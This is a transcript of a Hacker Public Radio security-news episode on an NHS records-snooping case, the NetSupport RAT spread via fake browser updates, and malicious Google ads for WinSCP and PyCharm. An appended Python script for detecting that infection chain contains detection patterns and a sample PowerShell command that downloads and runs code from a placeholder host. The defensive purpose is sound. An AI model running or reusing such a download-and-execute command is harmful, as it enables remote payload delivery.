Episode: 3997
Title: HPR3997: The Oh No! News.
Source: https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr3997/hpr3997.mp3
Transcribed: 2025-10-25 18:26:14
---
This is Hacker Public Radio Episode 3997 for Tuesday, the 28th of November 2023.
Today's show is entitled The Oh No! News.
It is part of the series Privacy and Security.
It is hosted by Some Guy On The Internet, and is about 15 minutes long.
It carries a clean flag.
The summary is: Scotty talks about malware distributed via Google's dynamic ads and more.
Hello and welcome to another episode of Hacker Public Radio.
I'm your host, some guy on the internet.
First of all, I'd like to apologize for the background noise.
I have the washer and dryer going, and if you can hear it in the background, it sounds
like a zipper rattling around in the dryer.
Unfortunately, at this time, there's nothing I can do about it.
With that said, let's get on with the show.
Threat analysis, your attack surface.
Now for the first bit of news, we're going to head on over to the UK, where we're going to be talking about a former NHS secretary that was found guilty of accessing patient records. Illegally. That's right. And this person was found guilty and fined for accessing over 150 people's medical records illegally. Their name is Loretta Alborghetti, and they're from a town somewhere in the UK, I suppose, called Redditch. I feel like I have to definitely invoke my American accent with the humble vibes of the internet when I say that word. Redditch.

Now this individual worked as the medical secretary within the ophthalmology department of the Worcestershire Acute Hospitals NHS Trust. The incident apparently happened somewhere around June of 2019, and they don't really say in the story how the patient who first noticed that something fishy was going on, like how they discovered it. My guess is there was a bit of social engineering, maybe during conversation with this secretary: this patient, who was I guess in no way under the care of Miss Alborghetti, must have been involved in conversation and suddenly their medical records may have come up in the conversation, right? Like I said, the story does not tell us how the patient knew, but apparently the patient grew concerned because obviously this person, who has no business accessing the medical records, is now just simply revealing that they have access to this person's medical records, but they have no responsibility of care.

And one of the bits of information I learned from the story: apparently this may be an actual legal term or just a common term in the UK, they refer to it as a "business need". So I'm assuming when dealing with legal cases and law, anything like that, in this story they refer to her illegal access as being without consent or having a business need. So I thought that was interesting, I thought I'd share it. It made clear that the records she was accessing were not a part of her department. She's a part of an ophthalmology department, hopefully I'm saying that correctly.

Alright, she already had her court date on the 15th of November 2023, where she pled guilty to unlawfully obtaining personal data under Section 170 of the Data Protection Act of 2018. And she was ordered to pay a total of a whopping 648 pounds.

So I know a few of you may be wondering why on earth is this story in here? Simple: the same way you review logs on your systems because you're looking for a data breach is the same way you can actually review information in the conversation to learn whether or not somebody around you has information about you that they shouldn't have. And I'm assuming that's how this person was found out. They were revealing that they have information that, well, they really have no, quote, business need, close quote, and they were found out. So don't just review the logs on your system, review the logs of the conversations around you. That's right, look to the nearest individual that's next to you and ask them, "Let me see your logs." Oh, and by the way, if you end up in HR because of that, you're on your own. I will deny all knowledge of knowing you or having said this.

Now I've never been to the UK, let alone Redditch, but I have included an OpenStreetMap link so that way you can click on it and kind of see what the area looks like. From the OpenStreetMap map it looks pretty nice, looks like there's lots of rural area. So the next time you decide to swing by Redditch, make sure that you stop by and say hello to someone that actually lives there. In our next article:
Heading on over to The Hacker News, looks like we're covering NetSupport again, which originated as a legitimate remote administration tool, now classified as a remote access trojan. So it's 100% malware. I believe the intention was always to become malware, but in order to first get a group of victims, it started off as a legitimate tool. Well, apparently it's on the rise again. A cybersecurity firm has reported that there have been new infections of this RAT, short for remote access trojan, and it's coming to us via WordPress. Good old WordPress, filled with malware.

Yeah, I'm pretty sure it probably starts out: someone new wants to save a couple of dollars putting up their own website. They heard about WordPress, probably even grabbed a few plugins that aren't supported anymore, stacked it all together on the internet and just walked away from it. When you do that, script kiddies come along. They basically hijack your site and start using it for this kind of behavior. So I'm not surprised. The moment I saw WordPress in the story, I already knew what had happened, and the story doesn't specifically tell us everything that I just said, where, you know, script kiddies come along and hijack a site due to an unmaintained WordPress plugin. But it does tell you that basically once the attackers gain access to the WordPress site, however they accomplish that, the attack then starts with some social engineering: it uses deceptive browser updates. From there you get a JavaScript payload. The JavaScript payload then leads to a PowerShell script. The PowerShell script then reaches out and grabs the RAT. Then it'll beacon out to a C2 server, C2 being command and control. And now your PC is owned. Now, looks like it's just Windows PCs for now. But if you are using Unix-like systems, it doesn't mean that you can just relax. Just because the payload does not run on a Unix-like system doesn't mean the Unix-like system cannot be used to spread the infection to Windows machines, thus making you a carrier of the payload.

So in summary, be careful of deceptive browser updates. If you don't already have a pop-up blocker or some DNS protection like Pi-hole, you probably want to look into that. It's just the safest way to view the internet right now. I don't care what anyone says about pirating or whatever. You need to protect yourself, figure out the rest later.
In our next article: beware, malicious Google ads trick WinSCP users into installing malware. Now this story is related to our last story in the way that you should be using an ad blocker, because it is for your security on the internet. Social engineering isn't just when an individual texts you or engages in a phone call with you in an attempt to gain access to whatever information you have. It is also a, for lack of a better term, product provided by Google.

Alright, so in this story, attackers were believed to be using Google's dynamic ads, I believe they call them DSAs, dynamic search ads. This is a product by Google. And I'm sure if you look deep enough into it, it's got something to do with AI, right? You want to be the fastest one out there just providing ads quick and easy based off of whatever's on the internet. Attackers probably found a way to abuse this system using these dynamic search ads; they're now using Google to advertise malware to Google's users. If you're using Google Chrome, if you're using the Google web engine, and you're doing that without an ad blocker, ads that you're being served via Google may contain malware. If they don't contain it, they'll lead you to where you're going to get the malware. The story goes into more detail telling us about how these fake WinSCP sites operate and how some individuals, good heavens, were rickrolled on the internet. That was just one of the examples of what happened, but truthfully, there are some malicious payloads also being delivered. So if all that happens to you through one of these ads is that you click on it and get rickrolled, count yourself lucky and go ahead and get yourself an ad blocker. Or set up a Pi-hole.

Now the story also talks about, or it links to, a previous attack where the attackers attempted to link unsuspecting users to a malicious copy of PyCharm, which is a Python development environment. I'll go ahead and pull that link, put it down in the show notes so you can have a look at it. But the reason I'm mentioning it is because it once again covers the exact same thing: you need to be using an ad blocker. The people who were led to this malicious version of PyCharm, that was infected with malware and attempted to be distributed to unsuspecting users by the attackers, they were served these malicious ads.

Now in these stories, they like to use all of this language that I cut out when I'm giving the stories. Like for instance, they call it malvertising. I'm never going to do that. Same thing like when you see phishing: we all understand phishing, but they like to change it whenever it happens via other communication platforms. So you'll see it called vishing, with a V, instead of normal phishing with a pH. I've also seen smishing once before. Did you just get a little carried away? Some of that sensational journalism going on out there. Same thing with the language used to cover attackers. I use a simple generic term that everyone will understand: attackers. I'm not calling them threat actors. I'm not calling them cyber gangs or any of this nonsense. But, back on track with the whole PyCharm thing. Basically, the users were served an ad via Google when they were looking to get PyCharm. The ad led them to a false location where they received a malicious version of PyCharm. And there you go. Now you've got a developer running around with all sorts of malware loaded up on their system. There's no telling how that's affecting their project. So just a ton of work that needs to be done after that kind of thing gets found out. TLDR: get an ad blocker, or else you're going to end up with malware, especially if you're using Google.

Info sec, the language of security.
All right, we're going to go ahead and round things out with info sec and you, the consumers, as well as those of you who count yourself as the defenders. Here's a nice little article. I thought I'd include it because it does contain a lot of helpful information. But here for the show, I'll go ahead and give you a little bit of a TLDR. If you're a company out there and you're deploying a project, stop trying to be the fastest one to deliver whatever it is with the least amount of people hired to do that job. Where your breakdown is going to happen is when you don't have enough human beings monitoring for threats. I mean, how many times have we seen stories where companies are trying to cut down the costs, but they do so in QA and other areas where they desperately need human beings to actually review the product before it is released. You know, if you had actual human beings there, you can catch a lot of this stuff, but companies want to cut down on that cost. They do that through labor, and they try to replace it with AI and other software measures to reduce costs. If you're going to adopt the mindset of being the fastest one out the gate to deliver product, then you'll have to maintain that way of thinking by hiring people to help you do that. That's the first thing that I'll say under the TLDR flag there, because the article is quite long and covers a number of wonderful points.

And the second thing, well, second and last, I'll leave the rest up to you if you'd want to read through the article. Automation does not necessarily mean AI, or what we're referring to as AI. Because to be honest with you, AI just sounds like better database access, right? Or what some would refer to as better database access. It depends on how you're using this technology. But more to the point, you want automation so that, yes, there is some hands-off and more standardization of the process, but you want human beings monitoring the process nonetheless. Just because it's automated does not mean it cannot be attacked or flawed. Fresh eyes normally find flaws, but you only have fresh eyes if you have people. You know what I mean? Also, you know, cough cough, wouldn't hurt to open source the code so that we can have more eyes on it, cough cough.

But that's all I got time for today. I'm going to go ahead and cut you guys loose, get this episode out the door because we're low on shows, and I believe I've taken up enough of your time. You want to hear more Oh No! News? Stay tuned in to Hacker Public Radio. We have tons of wonderful shows by tons of wonderful hosts. I was about to say correspondents, but that sounds kind of wild. Put my monocle on and grab my cup of tea. Yes, I'm a correspondent here on the HPR. No, but seriously, I'll catch you guys in the next episode. Oh no!
You have been listening to Hacker Public Radio at hackerpublicradio.org. Today's show was contributed by a HPR listener like yourself. If you ever thought of recording a podcast, then click on our contribute link to find out how easy it really is. Hosting for HPR has been kindly provided by an honesthost.com, the Internet Archive, and rsync.net. Unless otherwise stated, today's show is released under a Creative Commons Attribution 4.0 International License.
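The NetSupport story in the episode describes a chain of stages: a deceptive browser-update page, a JavaScript payload, a PowerShell script that fetches the RAT, and a beacon out to a C2 server. The following is an added example from the defender's side, written for this transcript; it is not code from the episode, from The Hacker News article, or from any vendor. It walks a handful of constructed process-creation records (a made-up tab-separated format with host names, file names and an `example.invalid` URL that are all invented here) and flags hosts where more than one stage of that chain shows up, which is the kind of correlation a SOC would want rather than alerting on any single PowerShell launch.

```python
"""Toy detection for the stage chain described in the episode:
fake browser update -> JavaScript dropper -> PowerShell downloader -> RAT -> C2.

Added, constructed example (not from the episode or any vendor). The log format
is invented: tab-separated  timestamp, host, parent image, image, command line.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # run the .js stage
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a download-and-execute stage (constructed list).
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s|Net\.WebClient|"
    r"-EncodedCommand|-enc\s|-e(xecutionpolicy|p)?\s+bypass|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def parse(line: str) -> ProcEvent:
    """Split one constructed record into its five fields (command line may contain tabs)."""
    ts, host, parent, image, cmdline = line.rstrip("\n").split("\t", 4)
    return ProcEvent(ts, host, parent.lower(), image.lower(), cmdline)


def classify(ev: ProcEvent) -> list[str]:
    """Tag a single event with the chain stage(s) it matches; empty list if benign."""
    tags = []
    if ev.parent in BROWSERS and ev.image in SCRIPT_HOSTS | POWERSHELL:
        tags.append("browser-spawned-script-host")        # lure page -> JS dropper
    if ev.image in POWERSHELL and DOWNLOAD_CRADLE.search(ev.cmdline):
        tags.append("powershell-download-cradle")         # PowerShell fetching the RAT
    if ev.parent in SCRIPT_HOSTS and ev.image in POWERSHELL:
        tags.append("script-host-spawned-powershell")     # JS dropper -> PowerShell
    return tags


def detect(lines, min_stages: int = 2) -> dict[str, list[str]]:
    """Return {host: sorted tags} for hosts where at least `min_stages` distinct
    stages were observed. A lone PowerShell launch (admin running a script) is
    not enough; the chain is what makes it suspicious."""
    per_host: dict[str, set[str]] = {}
    for line in lines:
        if not line.strip():
            continue
        ev = parse(line)
        tags = classify(ev)
        if tags:
            per_host.setdefault(ev.host, set()).update(tags)
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= min_stages}


# Constructed sample: WS-07 shows the full chain, WS-12 is an admin running a local script.
SAMPLE_LOG = (
    "2023-11-20T09:01:02Z\tWS-07\texplorer.exe\tchrome.exe\t"
    "\"C:\\Program Files\\Google\\Chrome\\chrome.exe\"\n"
    "2023-11-20T09:03:15Z\tWS-07\tchrome.exe\twscript.exe\t"
    "wscript.exe C:\\Users\\alice\\Downloads\\Chrome-Update.js\n"
    "2023-11-20T09:03:16Z\tWS-07\twscript.exe\tpowershell.exe\t"
    "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')\"\n"
    "2023-11-20T09:10:00Z\tWS-12\texplorer.exe\tpowershell.exe\t"
    "powershell.exe -File C:\\Scripts\\inventory.ps1\n"
    "2023-11-20T09:11:00Z\tWS-12\tpowershell.exe\tcmd.exe\tcmd.exe /c dir\n"
)

if __name__ == "__main__":
    for host, tags in detect(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {', '.join(tags)}")
```

The benign WS-12 record is deliberately included: PowerShell launched from Explorer with a local `-File` argument never matches the cradle pattern, and even if it did, a single stage on a host would stay under the `min_stages` threshold. The regex is a toy and should be treated as a starting point, not a tuned rule.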